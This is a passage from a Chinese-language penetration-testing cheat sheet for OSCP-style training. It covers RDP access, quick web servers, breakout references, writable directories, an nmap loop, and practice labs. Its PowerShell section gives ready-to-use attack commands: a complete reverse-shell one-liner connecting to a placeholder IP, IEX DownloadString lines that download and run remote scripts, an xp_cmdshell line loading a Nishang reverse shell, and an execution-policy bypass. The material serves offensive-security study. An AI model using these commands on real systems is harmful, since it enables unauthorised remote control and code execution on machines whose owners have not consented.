rdesktop -u user -p password 10.10.10.10 -g 85% -r disk:share=/root/
xfreerdp /d:domain.local /u:username /p:password /v:10.10.10.10 /cert-ignore
```
## 实用参考资料
### Web 服务器 (快速设置)
```
python -m SimpleHTTPServer 80 # Python 2
python3 -m http.server 80 # Python 3
php -S 0.0.0.0:80 # PHP
ngrok http 80 # ngrok
```
### 突破限制 / 逃逸环境
- [Pentest Partners - 突破 Citrix 限制](https://www.pentestpartners.com/security-blog/breaking-out-of-citrix-and-other-restricted-desktop-environments/)
- [SRA.io - SiteKiosk 突破](https://sra.io/blog/sitekiosk-breakout/)
- [TrustedSec - Kiosk/POS 突破按键](https://www.trustedsec.com/blog/kioskpos-breakout-keys-in-windows/)
- [NCC Group - 环境逃逸问题 (PDF)](https://research.nccgroup.com/wp-content/uploads/2020/07/research-insights_common-issues-with-environment-breakouts.pdf)
- [GracefulSecurity - Citrix 突破](https://gracefulsecurity.com/citrix-breakout/)
- [NetSPI - 突破应用程序限制](https://blog.netspi.com/breaking-out-of-applications-deployed-via-terminal-services-citrix-and-kiosks/)
### 可写目录
#### Windows
普通用户默认可写的目录(因操作系统版本而异):
```
C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
```
来源:[UltimateAppLockerByPassList](https://github.com/api0cradle/UltimateAppLockerByPassList/blob/master/Generic-AppLockerbypasses.md)
#### Linux
```
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print
```
### Metasploit 技巧
#### 添加自定义模块
- [如何从 Exploit-DB 向 Metasploit 添加模块](https://medium.com/@pentest_it/how-to-add-a-module-to-metasploit-from-exploit-db-d389c2a33f6d)
### Nmap 自动化脚本
扫描多个 IP 并输出规整的结果(本仓库中包含的 `automap.sh`):
```
#!/bin/bash
for line in $(cat ip.txt); do
mkdir -p $line/screenshots
nmap -sC -sV -p- -o ./$line/Full-TCP $line -Pn --min-rate 2000
done
```
### 实验室与练习
| 类别 | 实验室 | URL |
|---|---|---|
| 终端技能 | OverTheWire Bandit | https://overthewire.org/wargames/bandit/ |
| Web 黑客 | OverTheWire Natas | https://overthewire.org/wargames/natas/ |
| XSS | Google XSS Game | https://xss-game.appspot.com/ |
| XSS | PwnFunction XSS Labs | https://xss.pwnfunction.com/ |
| XSS | PortSwigger XSS Labs | https://portswigger.net/web-security/cross-site-scripting |
| XSS | alert(1) to win | http://alf.nu/alert1 |
### Windows 框架 / PowerShell
#### 绕过执行策略
```
powershell -ExecutionPolicy ByPass -File script.ps1
```
#### 反弹 PowerShell
```
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
```
#### 加载远程脚本
```
# PowerUp
echo IEX(New-Object Net.WebClient).DownloadString('http://10.10.10.10:80/PowerUp.ps1') | powershell -noprofile -
# 通用
powershell -nop -exec bypass IEX "(New-Object Net.WebClient).DownloadString('http://10.10.10.10/Script.ps1'); Invoke-Script"
```
#### 通过 MSSQL 实现反弹 Shell
```
xp_cmdshell powershell IEX(New-Object Net.WebClient).downloadstring(\"http://10.10.10.10/Nishang-ReverseShell.ps1\")
```
#### 使用 PowerShell 进行文件传输
```
powershell -c IEX(New-Object Net.WebClient).DownloadFile('http://10.10.10.10/file', 'file')
```
**资源:**
- [Nishang](https://github.com/samratashok/nishang) - PowerShell 攻击框架
- [Sherlock](https://github.com/rasta-mouse/Sherlock) - PowerShell 权限提升查找器(已弃用,请使用 Watson)
## 致谢
感谢以下人员将我的速查表收录到他们的网站/博客中:
- [KhaoticDev Cheatsheets](https://khaoticdev.net/cheatsheets/#collections)
- [NCyberSec Facebook Post](https://www.facebook.com/ncybersec/posts/1541830509321001)
- [CyberG0100 Facebook Post](https://www.facebook.com/cyberg0100/posts/github-sinfulzjusttryharder-justtryharder-a-cheat-sheet-which-will-aid-you-throu/653235345249466)
- [r/CyberSpaceVN Reddit Post](https://www.reddit.com/r/CyberSpaceVN/comments/f3n2wp/github_sinfulzjusttryharder_justtryharder_a_cheat)
- [XN4K PWK Cheatsheet](https://xn4k.github.io/pentest/PWK-course-&-the-OSCP-Exam-Cheatsheet/)
- [OpenSourceLibs Pentesting Tools](https://opensourcelibs.com/libs/pentesting-tools)
- [BugBountyTips Blog](https://www.bugbountytips.tech/2020/08/23/justtryharderpwk-cheatsheetkali-linux-cheatsheethydra-cheatsheetsecu-2/)
- [PythonLang OSCP Category](https://pythonlang.dev/category/oscp/)
标签:AI合规, CTI, HTTP工具, OSCP认证, Web报告查看器, 协议分析, 插件系统, 权限提升, 网络安全, 逆向工具, 速查表, 隐私保护